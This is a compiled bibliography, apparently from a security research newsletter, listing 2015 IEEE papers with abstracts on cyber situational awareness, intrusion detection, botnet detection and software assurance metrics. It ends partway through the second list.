Abstract: Homeland safety and security will increasingly depend upon autonomous unmanned vehicles as a method of assessing and maintaining situational awareness. As autonomous team algorithms evolve toward requiring less human intervention, it may be that having an “operator-in-the-loop” becomes the ultimate goal in utilizing autonomous teams for surveillance. However studies have shown that trust plays a factor in how effectively an operator can work with autonomous teammates. In this work, we study mechanisms that look at autonomy as a system and not as the sum of individual actions. First, we conjecture that if the operator understands how the team autonomy is designed that the user would better trust that the system will contribute to the overall goal. Second, we focus on algorithm input criteria as being linked to operator perception and trust. We focus on adding a time-varying spatial projection of areas in the ROI that have been unseen for more than a set duration (STEC). Studies utilize a custom test bed that allows users to interact with a surveillance team to find a target in the region of interest. Results show that while algorithm training had an adverse effect, projecting salient team/surveillance state had a statistically significant impact on trust and did not negatively affect workload or performance. This result may point at a mechanism for improving trust through visualizing states as used in the autonomous algorithm.

keywords: autonomous aerial vehicles;mobile robots;multi-robot systems;national security;surveillance;ROI;adverse effect;autonomous team algorithms;autonomous teammates;autonomous unmanned vehicles;homeland safety;homeland security;intelligent multirobot surveillance system;operator in the loop;operator perception;operator trust;region of interest;salient team projection;situational awareness;state visualization;surveillance state projection;team autonomy;time-varying spatial projection;Automation;Robots;Standards;Streaming media;Surveillance;Training;User interfaces (ID#: 16-9285)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7139654&isnumber=7138973

 

Balfour, R.E., "Building the “Internet of Everything” (IoE) for first responders," in Systems, Applications and Technology Conference (LISAT), 2015 IEEE Long Island, pp. 1-6, 1-1 May 2015. doi: 10.1109/LISAT.2015.7160172

Abstract: The “Internet of Everything” (IoE) describes the “bringing together of people, process, data, and things to make networked connections more relevant and valuable than ever before”. IoE encompasses both machine-to-machine (M2M) and Internet-of-Things (IoT) technologies, and it is the pervasiveness of IoE than can be leveraged to achieve many things for many people, including first responders. The emerging IoE will continue to evolve over the next ten years and beyond, but the IoT can happen now, with automated M2M communications bringing first responder communications and situational awareness to the leading-edge of IoE-leveraged technology - exactly where they belong as they risk their lives to protect and save others. Presented here are a number of technological capabilities that are critical to achieving the IoE, especially for first responders and emergency managers, including (a) Security; (b) a global M2M standard; (c) powerful four-dimensional M2M applications; and (d) Data Privacy and trust. For advanced security, Software Defined network Perimeters (SDP) can provide the critical functionality to protect and secure M2M nodes in an ad-hoc M2M IoT/IoE network. Without a secure, dynamic, M2M network, the vision of an emergency responder instantly communicating with a “smart building” would not be feasible. But with SDP, it can, and will, happen. SDP enables an ad-hoc, secure M2M network to rapidly deploy and “hide in plain sight”. In an emergency response situation, this is exactly what we need. For M2M/IoT to go mobile and leverage global IoE capabilities anywhere (which is what emergency responders need as emergency locations are somewhat unpredictable and change every day), a global industry standard must be, and is being, developed: oneM2M. And the existing fourDscape® technology/platform could quickly support a oneM2M system structure that can be deployed in the short term, with the fo- rDscape browser providing powerful M2M IoT/IoE applications and 4D visualizations. Privacy-by-design principles can also be applied and other critical related issues addressed beyond privacy (i.e. once privacy is achieved and available IoE sensors/data can be leveraged), such as trusting, scaling, hacking, and securing M2M IoT/IoE devices and systems. Without the full package of IoE innovation embracing the very public IoE world in a very private and secure way, and can continue to evolve in parallel with emerging commercial IoE technology, first responders would not be able to leverage the commercial state-of-the-art in the short term and in the years to come. Current technology innovation can change that.

keywords: Internet of Things;computer crime;data privacy;data visualisation;innovation management;software defined networking;trusted computing;4D visualizations;Internet of Everything;Internet-of-Things technologies;IoE pervasiveness;IoT technologies;M2M network security;SDP;ad-hoc M2M IoT/IoE network;ad-hoc network;automated M2M communications;data privacy;emergency responder;emergency response situation;four-dimensional M2M applications;fourDscape browser;global IoE capabilities;global M2M standard;global industry standard;hacking;machine-to-machine;oneM2M system structure;privacy-by-design principles;responder communications;situational awareness;smart building;software defined network perimeters;technology innovation;trust;Ad hoc networks;Buildings;Computer architecture;Mobile communication;Security;Tablet computers;Internet-of-Everything;Internet-of-Things;IoE;IoT;M2M;Machine-to-Machine;PbD;Privacy-by-Design;SDP;Software Defined Network Perimeters;fourDscape (ID#: 16-9286)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160172&isnumber=7160171

 

Dwivedi, N.; Tripathi, A., "Event Correlation for Intrusion Detection Systems," in Computational Intelligence & Communication Technology (CICT), 2015 IEEE International Conference on, pp. 133-139, 13-14 Feb. 2015. doi: 10.1109/CICT.2015.111

Abstract: Intrusion Detection System (IDS) have grown into a mature and feature rich technology that provides advanced features to detect intrusion and provide responses. It also allows the management system for security analysis by monitoring, configuring and analyzing the intrusion data. A better understanding of alerts by using a general framework and infrastructure for detecting intrusions through event correlation strategy minimizes the amount of data generated. Event correlation techniques are needed for two reasons. First, network attack detection is usually based on information or data received from distributed sensors, e.g. intrusion detection systems. During attacks, the generated amount of events is hard to handle and so it is difficult to evaluate the current attack situation for a larger network. Thus, the concept of event or alert correlation has been introduced. Event correlation paints a picture of what is now being called as network or cyber situational awareness and tries to guide the security administrator on the actions that he can take to mitigate the crisis. The aim of the event correlation for intrusion detection system (IDS) is to improve security by correlating events and reduce the workload on an IDS analyst. This correlation has been achieved by getting together similar alerts, thus allowing the analyst to only look at a few alerts instead of hundreds or thousands of alerts. In this paper, we correlate the results of SNORT Intrusion Detection System (IDS) with SEC (Simple Event Correlator) by taking the input from the MIT DARPA (Defense advanced Research Projects Agency) dataset. The alerts generated from Snort are very large and so it is difficult for the administrators to identify them. Here we correlate the alerts based on same name coming from different IP address. This correlation removes the duplication of alerts and thus reduces the information overload on the administrator.

keywords: IP networks;computer network security;correlation methods;Defense advanced Research Projects Agency;IDS;IP address;MIT DARPA dataset;SEC;SNORT intrusion detection system;alert correlation;cyber situational awareness;distributed sensors;event correlation strategy;management system;network attack detection;security administrator;security analysis;simple event correlator;workload reduction;Computers;Correlation;Feature extraction;Intrusion detection;Monitoring;Sensors;Correlation;DARPA;IDS;SEC;events (ID#: 16-9287)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7078682&isnumber=7078645

 

Leszczyna, R.; Wrobel, M.R., "Evaluation of open source SIEM for situation awareness platform in the smart grid environment," in Factory Communication Systems (WFCS), 2015 IEEE World Conference on, pp. 1-4, 27-29 May 2015. doi: 10.1109/WFCS.2015.7160577

Abstract: The smart grid as a large-scale system of systems has an exceptionally large surface exposed to cyber-attacks, including highly evolved and sophisticated threats such as Advanced Persistent Threats (APT) or Botnets. When addressing this situation the usual cyber security technologies are prerequisite, but not sufficient. The smart grid requires developing and deploying an extensive ICT infrastructure that supports significantly increased situational awareness and enables detailed and precise command and control. The paper presents one of the studies related to the development and deployment of the Situation Awareness Platform for the smart grid, namely the evaluation of open source Security Information and Event Management systems. These systems are the key components of the platform.

keywords: Internet;computer network security;grid computing;public domain software;APT;ICT infrastructure;advanced persistent threats;botnets;command-and-control;cyber-attacks;open source SIEM evaluation;open source security information-and-event management systems;situation awareness platform;smart grid environment;Computer security;NIST;Sensor systems;Smart grids;Software;SIEM;evaluation;situation awareness;smart grid (ID#: 16-9288)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160577&isnumber=7160536

 

Sixiao Wei; Dan Shen; Genshe Chen; Hanlin Zhang; Wei Yu; Blasch, E.; Pham, K.; Cruz, J.B., "On effectiveness of game theoretic modeling and analysis against cyber threats for avionic systems," in Digital Avionics Systems Conference (DASC), 2015 IEEE/AIAA 34th, pp. 4B2-1-4B2-13, 13-17 Sept. 2015

doi: 10.1109/DASC.2015.7311417

Abstract: Cyber-attack defense requires network security situation awareness through distributed collaborative monitoring, detection, and mitigation. An issue of developing and demonstrating innovative and effective situational awareness techniques for avionics has increased in importance in the last decade. In this paper, we first conducted a game theoretical based modeling and analysis to study the interaction between an adversary and a defender. We then introduced the implementation of game-theoretic analysis on an Avionics Sensor-based Defense System (ASDS), which consists of distributed passive and active network sensors. A trade-off between defense and attack strategy was studied via existing tools for game theory (Gambit). To further enhance the defense and mitigate attacks, we designed and implemented a multi-functional web display to integrate the game theocratic analysis. Our simulation validates that the game theoretical modeling and analysis can help the Avionics Sensor-based Defense System (ASDS) adapt detection and response strategies to efficiently and dynamically deal with various cyber threats.

keywords: aerospace computing;avionics;distributed sensors;game theory;security of data;ASDS;Gambit;active network sensors;avionic systems;avionics sensor-based defense system;cyber threats;cyber-attack defense;distributed collaborative detection;distributed collaborative mitigation;distributed collaborative monitoring;distributed passive network sensors;game theoretic modeling;multifunctional Web display;network security situation awareness techniques;Monitoring (ID#: 16-9289)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7311417&isnumber=7311321

 

Glowacka, J.; Krygier, J.; Amanowicz, M., "A trust-based situation awareness system for military applications of the internet of things," in Internet of Things (WF-IoT), 2015 IEEE 2nd World Forum on, pp. 490-495, 14-16 Dec. 2015. doi: 10.1109/WF-IoT.2015.7389103

Abstract: Integration of heterogeneous objects diverse in technology, environmental constraints and level of trust is a challenging issue. The paper presents a novel trust-based cognitive mechanism making the objects of IoT infrastructure capable to build their situational awareness, and use this knowledge for appropriate reaction to detected threats. We demonstrate, by simulation, the efficiency of the proposed solution, and its robustness to attacks on the reputation system.

keywords: Internet of Things;military communication;telecommunication security;Internet of Things;IoT infrastructure;environmental constraints;heterogeneous object integration;military applications;reputation system;trust-based cognitive mechanism;trust-based situation awareness system;Cryptography;Electron tubes;Internet of things;Robustness;Routing protocols;Standards;Internet of Things;inference;reputation attack;reputation system;situation awareness;trust (ID#: 16-9290)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7389103&isnumber=7389012

 

Torres, G.; Smith, K.; Buscemi, J.; Doshi, S.; Ha Duong; Defeng Xu; Pickett, H.K., "Distributed StealthNet (D-SN): Creating a live, virtual, constructive (LVC) environment for simulating cyber-attacks for test and evaluation (T&E)," in Military Communications Conference, MILCOM 2015 - 2015 IEEE, pp.1284-1291, 26-28 Oct. 2015. doi: 10.1109/MILCOM.2015.7357622

Abstract: The Services have become increasingly dependent on their tactical networks for mission command functions, situational awareness, and target engagements (terminal weapon guidance). While the network brings an unprecedented ability to project force by all echelons in a mission context, it also brings the increased risk of cyber-attack on the mission operation. With both this network use and vulnerability in mind, it is necessary to test new systems (and networked Systems of Systems (SoS)) in a cyber-vulnerable network context. A new test technology, Distributed-StealthNet (D-SN), has been created by the Department of Defense Test Resource Management Center (TRMC) to support SoS testing with cyber-attacks against mission threads. D-SN is a simulation/emulation based virtual environment that can provide a representation of a full scale tactical network deployment (both Radio Frequency (RF) segments and wired networks at command posts). D-SN has models of real world cyber threats that affect live tactical systems and networks. D-SN can be integrated with live mission Command and Control (C2) hardware and then a series of cyber-attacks using these threat models can be launched against the virtual network and the live hardware to determine the SoS's resiliency to sustain the tactical mission. This paper describes this new capability and the new technologies developed to support this capability.

keywords: command and control systems;computer network security;military communication;wide area networks;C2 hardware;Command and Control hardware;D-SN;LVC environment;T&E;TRMC;cyberattack simulation;cybervulnerable network context;department of defense test resource management center;distributed stealthnet;live,virtual, constructive environment;tactical network;test and evaluation;Computational modeling;Computer architecture;Computers;Hardware;Ports (Computers);Real-time systems;Wide area networks (ID#: 16-9291)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7357622&isnumber=7357245

 

Aggarwal, P.; Grover, A.; Singh, S.; Maqbool, Z.; Pammi, V.S.C.; Dutt, V., "Cyber security: A game-theoretic analysis of defender and attacker strategies in defacing-website games," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-8, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166127

Abstract: The rate at which cyber-attacks are increasing globally portrays a terrifying picture upfront. The main dynamics of such attacks could be studied in terms of the actions of attackers and defenders in a cyber-security game. However currently little research has taken place to study such interactions. In this paper we use behavioral game theory and try to investigate the role of certain actions taken by attackers and defenders in a simulated cyber-attack scenario of defacing a website. We choose a Reinforcement Learning (RL) model to represent a simulated attacker and a defender in a 2×4 cyber-security game where each of the 2 players could take up to 4 actions. A pair of model participants were computationally simulated across 1000 simulations where each pair played at most 30 rounds in the game. The goal of the attacker was to deface the website and the goal of the defender was to prevent the attacker from doing so. Our results show that the actions taken by both the attackers and defenders are a function of attention paid by these roles to their recently obtained outcomes. It was observed that if attacker pays more attention to recent outcomes then he is more likely to perform attack actions. We discuss the implication of our results on the evolution of dynamics between attackers and defenders in cyber-security games.

keywords: Web sites;computer crime;computer games;game theory;learning (artificial intelligence);RL model;attacker strategies;attacks dynamics;behavioral game theory;cyber-attacks;cyber-security game;defacing Website games;defender strategies;game-theoretic analysis;reinforcement learning;Cognitive science;Computational modeling;Computer security;Cost function;Games;Probabilistic logic;attacker;cognitive modeling;cyber security;cyber-attacks;defender;reinforcement-learning model (ID#: 16-9292)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166127&isnumber=7166109

 

Neogy, S., "Security management in Wireless Sensor Networks," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-4, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166112

Abstract: This paper aims to describe the characteristics of Wireless Sensor Networks (WSNs), challenges in designing a resource-constrained and vulnerable network and address security management as the main issue. The work begins with discussion on the attacks on WSNs. As part of protection against the attacks faced by WSNs, key management, the primary requirement of any security practice, is detailed out. This paper also deals with the existing security schemes covering various routing protocols. The paper also touches security issues concerning heterogeneous networks.

keywords: routing protocols;telecommunication security;wireless sensor networks;WSN;heterogeneous networks;routing protocols;security management schemes;wireless sensor networks;Cryptography;Receivers;Routing;Routing protocols;Wireless sensor networks;attack;cryptography;key management;protocol;routing;security;wireless sensor network (ID#: 16-9293)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166112&isnumber=7166109

 

Pietrowicz, S.; Falchuk, B.; Kolarov, A.; Naidu, A., "Web-Based Smart Grid Network Analytics Framework," in Information Reuse and Integration (IRI), 2015 IEEE International Conference on, pp. 496-501, 13-15 Aug. 2015. doi: 10.1109/IRI.2015.82

Abstract: As utilities across the globe continue to deploy Smart Grid technology, there is an immediate and growing need for analytics, diagnostics and forensics tools akin to those commonly employed in enterprise IP networks to provide visibility and situational awareness into the operation, security and performance of Smart Energy Networks. Large-scale Smart Grid deployments have raced ahead of mature management tools, leaving gaps and challenges for operators and asset owners. Proprietary Smart Grid solutions have added to the challenge. This paper reports on the research and development of a new vendor-neutral, packet-based, network analytics tool called MeshView that abstracts information about system operation from low-level packet detail and visualizes endpoint and network behavior of wireless Advanced Metering Infrastructure, Distribution Automation, and SCADA field networks. Using real utility use cases, we report on the challenges and resulting solutions in the software design, development and Web usability of the framework, which is currently in use by several utilities.

keywords: Internet;power engineering computing;smart power grids;software engineering;Internet protocols;MeshView tool;SCADA field network;Web usability;Web-based smart grid network analytics framework;distribution automation;enterprise IP networks;smart energy networks;smart grid technology;software design;software development;wireless advanced metering infrastructure;Conferences;Advanced Meter Infrastructure;Big data visualization;Cybersecurity;Field Area Networks;Network Analytics;Smart Energy;Smart Grid;System scalability;Web management (ID#: 16-9294)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7301018&isnumber=7300933

 

Puri, Colin; Dukatz, Carl, "Analyzing and Predicting Security Event Anomalies: Lessons Learned from a Large Enterprise Big Data Streaming Analytics Deployment," in Database and Expert Systems Applications (DEXA), 2015 26th International Workshop on, pp. 152-158, 1-4 Sept. 2015. doi: 10.1109/DEXA.2015.46

Abstract: This paper presents a novel and unique live operational and situational awareness implementation bringing big data architectures, graph analytics, streaming analytics, and interactive visualizations to a security use case with data from a large Global 500 company. We present the data acceleration patterns utilized, the employed analytics framework and its complexities, and finally demonstrate the creation of rich interactive visualizations that bring the story of the data acceleration pipeline and analytics to life. We deploy a novel solution to learn typical network agent behaviors and extract the degree to which a network event is anomalous for automatic anomaly rule learning to provide additional context to security alerts. We implement and evaluate the analytics over a data acceleration framework that performs the analysis and model creation at scale in a distributed parallel manner. Additionally, we talk about the acceleration architecture considerations and demonstrate how we complete the analytics story with rich interactive visualizations designed for the security and business analyst alike. This paper concludes with evaluations and lessons learned.

keywords: Conferences; Databases; Expert systems; D3 visualization; anomaly detection; batch analytics; data acceleration; graph analytics; log content analytics; streaming analytics (ID#: 16-9295)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7406285&isnumber=7406238

 

Nasir, M.A.; Nefti-Meziani, S.; Sultan, S.; Manzoor, U., "Potential cyber-attacks against global oil supply chain," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-7, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166137

Abstract: The energy sector has been actively looking into cyber risk assessment at a global level, as it has a ripple effect; risk taken at one step in supply chain has an impact on all the other nodes. Cyber-attacks not only hinder functional operations in an organization but also waves damaging effects to the reputation and confidence among shareholders resulting in financial losses. Organizations that are open to the idea of protecting their assets and information flow and are equipped; enough to respond quickly to any cyber incident are the ones who prevail longer in global market. As a contribution we put forward a modular plan to mitigate or reduce cyber risks in global supply chain by identifying potential cyber threats at each step and identifying their immediate counterm easures.

keywords: globalisation;organisational aspects;petroleum industry;risk management;security of data;supply chain management;cyber incident;cyber risk assessment;cyber-attack;damaging effect;energy sector;financial losses;global market;global oil supply chain;global supply chain;information flow;organization;ripple effect;Companies;Computer hacking;Information management;Supply chains;Temperature sensors;cyber-attacks;cyber-attacks countermeasures;oil supply chain;threats to energy sector (ID#: 16-9296)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166137&isnumber=7166109

 

Evangelopoulou, M.; Johnson, C.W., "Empirical framework for situation awareness measurement techniques in network defense," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-4, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166132

Abstract: This paper presents an empirical framework for implementing Situation Awareness Measurement Techniques in a Network Defense environment. Bearing in mind the rise of Cyber-crime and the importance of Cyber security, the role of the security analyst (or as this paper will refer to them, defenders) is critical. In this paper the role of Situation Awareness Measurement Techniques will be presented and explained briefly. Input from previous studies will be given and an empirical framework of how to measure Situation Awareness in a computing network environment will be offered in two main parts. The first one will include the networking infrastructure of the system. The second part will be focused on specifying which Situation Awareness Techniques are going to be used and which Situation Awareness critical questions need to be asked to improve future decision making in cyber-security. Finally, a discussion will take place concerning the proposed approach, the chosen methodology and further validation.

keywords: computer crime;computer network security;decision making;computing network environment;cyber-crime;cybersecurity;decision making;network defense environment;situation awareness measurement techniques;Computer security;Decision making;Human factors;Measurement techniques;Monitoring;Unsolicited electronic mail;Cyber Security;CyberSA;Decision Making;Intrusion Detection;Network Defense;Situation Awareness;Situation Awareness Measurement Techniques (ID#: 16-9297)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166132&isnumber=7166109

 

Bjerkestrand, T.; Tsaptsinos, D.; Pfluegel, E., "An evaluation of feature selection and reduction algorithms for network IDS data," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-2, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166129

Abstract: Intrusion detection is concerned with monitoring and analysing events occurring in a computer system in order to discover potential malicious activity. Data mining, which is part of the procedure of knowledge discovery in databases, is the process of analysing the collected data to find patterns or correlations. As the amount of data collected, store and processed only increases, so does the significance and importance of intrusion detection and data mining. A dataset that has been particularly exposed to research is the dataset used for the Third International Knowledge Discovery and Data Mining Tools competition, KDD99. The KDD99 dataset has been used to identify what data mining techniques relate to certain attack and employed to demonstrate that decision trees are more efficient than the Naïve Bayes model when it comes to detecting new attacks. When it comes to detecting network intrusions, the C4.5 algorithm performs better than SVM. The aim of our research is to evaluate and compare the usage of various feature selection and reduction algorithms against publicly available datasets. In this contribution, the focus is on feature selection and reduction algorithms. Three feature selection algorithms, consisting of an attribute evaluator and a test method, have been used. Initial results indicate that the performance of the classifier is unaffected by reducing the number of attributes.

keywords: Bayes methods;data mining;decision trees;feature selection;security of data;C4.5 algorithm;KDD99 dataset;SVM;computer system;data mining technique;decision tree;feature selection;intrusion detection;naive Bayes model;network IDS data;network intrusion;potential malicious activity;reduction algorithm;third international knowledge discovery and data mining tools competition;Algorithm design and analysis;Classification algorithms;Data mining;Databases;Intrusion detection;Knowledge discovery;Training;KDD dataset;data mining;feature selection and reduction;intrusion detection;knowledge discovery (ID#: 16-9298)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166129&isnumber=7166109

 

Adenusi, D.; Kuboye, B.M.; Alese, B.K.; Thompson, A.F.-B., "Development of cyber situation awareness model," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-11, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166135

Abstract: This study designed and simulated cyber situation awareness model for gaining experience of cyberspace condition. This was with a view to timely detecting anomalous activities and taking proactive decision safeguard the cyberspace. The situation awareness model was modelled using Artificial Intelligence (AI) technique. The cyber situation perception sub-model of the situation awareness model was modelled using Artificial Neural Networks (ANN). The comprehension and projection submodels of the situation awareness model were modelled using Rule-Based Reasoning (RBR) techniques. The cyber situation perception sub-model was simulated in MATLAB 7.0 using standard intrusion dataset of KDD'99. The cyber situation perception sub-model was evaluated for threats detection accuracy using precision, recall and overall accuracy metrics. The simulation result obtained for the performance metrics showed that the cyber-situation sub-model of the cybersituation model better with increase in number of training data records. The cyber situation model designed was able to meet its overall goal of assisting network administrators to gain experience of cyberspace condition. The model was capable of sensing the cyberspace condition, perform analysis based on the sensed condition and predicting the near future condition of the cyberspace.

keywords: artificial intelligence;inference mechanisms;knowledge based systems;mathematics computing;neural nets;security of data;AI technique;ANN;Matlab 7.0;RBR techniques;anomalous activities detection;artificial intelligence;artificial neural networks;cyber situation awareness model;cyberspace condition;proactive decision safeguard;rule-based reasoning;training data records;Artificial neural networks;Computational modeling;Computer security;Cyberspace;Data models;Intrusion detection;Mathematical model;Artificial Intelligence;Awareness;cyber-situation;cybersecurity;cyberspace 9299) 9299)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166135&isnumber=7166109

 

Bode, M.A.; Alese, B.K.; Oluwadare, S.A.; Thompson, A.F.-B., "Risk analysis in cyber situation awareness using Bayesian approach," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-12, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166119

Abstract: The unpredictable cyber attackers and threats have to be detected in order to determine the outcome of risk in a network environment. This work develops a Bayesian network classifier to analyse the network traffic in a cyber situation. It is a tool that aids reasoning under uncertainty to determine certainty. It further analyze the level of risk using a modified risk matrix criteria. The classifier developed was experimented with various records extracted from the KDD Cup'99 dataset with 490,021 records. The evaluations showed that the Bayesian Network classifier is a suitable model which resulted in same performance level for classifying the Denial of Service (DoS) attacks with Association Rule Mining while as well as Genetic Algorithm, the Bayesian Network classifier performed better in classifying probe and User to Root (U2R) attacks and classified DoS equally. The result of the classification showed that Bayesian network classifier is a classification model that thrives well in network security. Also, the level of risk analysed from the adapted risk matrix showed that DoS attack has the most frequent occurrence and falls in the generally unacceptable risk zone.

keywords: Bayes methods;belief networks;computer network security;data mining;inference mechanisms;pattern classification;risk analysis;Bayesian approach;Bayesian network classifier;DoS attacks;KDD Cup 99 dataset;U2R attacks;association rule mining;classified DoS equally;cyber attackers;cyber situation;cyber situation awareness;cyber threats;denial of service attacks;genetic algorithm;modified risk matrix criteria;network environment;network security;network traffic analysis;risk analysis;user to root attacks;Bayes methods;Intrusion detection;Risk management;Telecommunication traffic;Uncertainty;Bayesian approach;Cyber Situation Awareness; KDD Cup'99; Risk matrix (ID#: 16-9300)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166119&isnumber=7166109

 

Stevanovic, M.; Pedersen, J.M., "An analysis of network traffic classification for botnet detection," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-8, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7361120

Abstract: Botnets represent one of the most serious threats to the Internet security today. This paper explores how network traffic classification can be used for accurate and efficient identification of botnet network activity at local and enterprise networks. The paper examines the effectiveness of detecting botnet network traffic using three methods that target protocols widely considered as the main carriers of botnet Command and Control (C&C) and attack traffic, i.e. TCP, UDP and DNS. We propose three traffic classification methods based on capable Random Forests classifier. The proposed methods have been evaluated through the series of experiments using traffic traces originating from 40 different bot samples and diverse non-malicious applications. The evaluation indicates accurate and time-efficient classification of botnet traffic for all three protocols. The future work will be devoted to the optimization of traffic analysis and the correlation of findings from the three analysis methods in order to identify compromised hosts within the network.

keywords: Internet;computer network security;invasive software;learning (artificial intelligence);pattern classification;telecommunication traffic;Internet security threats;attack traffic;botnet C&C;botnet command and control;botnet detection;botnet network activity;botnet network traffic detection;enterprise networks;local networks;network traffic classification analysis;nonmalicious applications;random forest classifier;traffic analysis optimization;Feature extraction;IP networks;Malware;Monitoring;Ports (Computers);Protocols;Botnet;Botnet Detection;Features Selection;MLAs;Random Forests;Traffic Analysis;Traffic Classification (ID#: 16-9301)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7361120&isnumber=7166109


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Software Assurance 2015

 

 
SoS Logo

Software Assurance 2015

 

Software assurance is an essential element in the development of scalable and composable systems.  For a complete system to be secure each subassembly must be secure and that security must be measureable. The research work cited here looks at software assurance metrics and was presented in 2015.


D. Kumar and M. Kumari, "Component Based Software Engineering: Quality Assurance Models, Metrics," Reliability, Infocom Technologies and Optimization (ICRITO) (Trends and Future Directions), 2015 4th International Conference on, Noida, 2015, pp. 1-6, 2015. doi: 10.1109/ICRITO.2015.7359358

Abstract: Component based software engineering is another pattern in software advancement. The fundamental thought is to reuse officially finished components as opposed to creating everything from the earliest starting point every time. Utilization of component based improvement brings numerous focal points: speedier advancement, lower expenses of the improvement, better ease of use, and so on. Component based improvement is however still not developing process there still exist numerous issues. Case in point, when you purchase a component you don't know precisely its conduct, you don't have control over its upkeep, et cetera. To have the capacity to effectively create component based items, the associations must present new improvement strategies. We have highlight Quality assurance for component based software. Through this paper we proposed a QAM of CBM that covers CRA, CD, certification, customization, and SAD, SI, ST, and SM.

Keywords: object-oriented programming; quality assurance; software engineering; software metrics; CBM; CD; CRA; QAM; SAD; SM; ST; Sl; certification; component based improvement; component based software engineering; quality assurance models; software advancement; software metrics; Quadrature amplitude modulation; Reliability; Component based software engineering; Metrics; Quality Assurance Characteristics; Quality Assurance Models; life cycle (ID#: 16-9409)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7359358&isnumber=7359191

 

C. Woody, R. Ellison and W. Nichols, "Predicting Cybersecurity Using Quality Data," Technologies for Homeland Security (HST), 2015 IEEE International Symposium on, Waltham, MA, 2015, pp. 1-5, 2015. doi: 10.1109/THS.2015.7225327

Abstract: Within the process of system development and implementation, programs assemble hundreds of different metrics for tracking and monitoring software such as budgets, costs and schedules, contracts, and compliance reports. Each contributes, directly or indirectly, toward the cybersecurity assurance of the results. The Software Engineering Institute has detailed size, defect, and process data on over 100 software development projects. The projects include a wide range of application domains. Data from five projects identified as successful safety-critical or security-critical implementations were selected for cybersecurity consideration. Material was analyzed to identify a possible correlation between modeling quality and security and to identify potential predictive cybersecurity modeling characteristics. While not a statistically significant sample, this data indicates the potential for establishing benchmarks for ranges of quality performance (for example, defect injection rates and removal rates and test yields) that provide a predictive capability for cybersecurity results.

Keywords: safety-critical software; security of data ;software quality; system monitoring; Software Engineering Institute; cybersecurity assurance; cybersecurity consideration; predictive capability; predictive cybersecurity modeling characteristics; programs assemble; quality data; quality performance; safety-critical implementation; security-critical implementation; software development project; software monitoring; software tracking; system development; Contracts; Safety; Schedules; Software; Software measurement; Testing; Topology; engineering security; quality modeling; security predictions; software assurance (ID#: 16-9410)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7225327&isnumber=7190491

 

A. Delaitre, B. Stivalet, E. Fong and V. Okun, "Evaluating Bug Finders -- Test and Measurement of Static Code Analyzers," Complex Faults and Failures in Large Software Systems (COUFLESS), 2015 IEEE/ACM 1st International Workshop on, Florence, 2015, pp. 14-20, 2015. doi: 10.1109/COUFLESS.2015.10

Abstract: Software static analysis is one of many options for finding bugs in software. Like compilers, static analyzers take a program as input. This paper covers tools that examine source code - without executing it - and output bug reports. Static analysis is a complex and generally undecidable problem. Most tools resort to approximation to overcome these obstacles and it sometimes leads to incorrect results. Therefore, tool effectiveness needs to be evaluated. Several characteristics of the tools should be examined. First, what types of bugs can they find? Second, what proportion of bugs do they report? Third, what percentage of findings is correct? These questions can be answered by one or more metrics. But to calculate these, we need test cases having certain characteristics: statistical significance, ground truth, and relevance. Test cases with all three attributes are out of reach, but we can use combinations of only two to calculate the metrics. The results in this paper were collected during Static Analysis Tool Exposition (SATE) V, where participants ran 14 static analyzers on the test sets we provided and submitted their reports to us for analysis. Tools had considerably different support for most bug classes. Some tools discovered significantly more bugs than others or generated mostly accurate warnings, while others reported wrong findings more frequently. Using the metrics, an evaluator can compare candidates and select the tool that aligns best with his or her objectives. In addition, our results confirm that the bugs most commonly found by tools are among the most common and important bugs in software. We also observed that code complexity is a major hindrance for static analyzers and detailed which code constructs tools handle well and which impede their analysis.

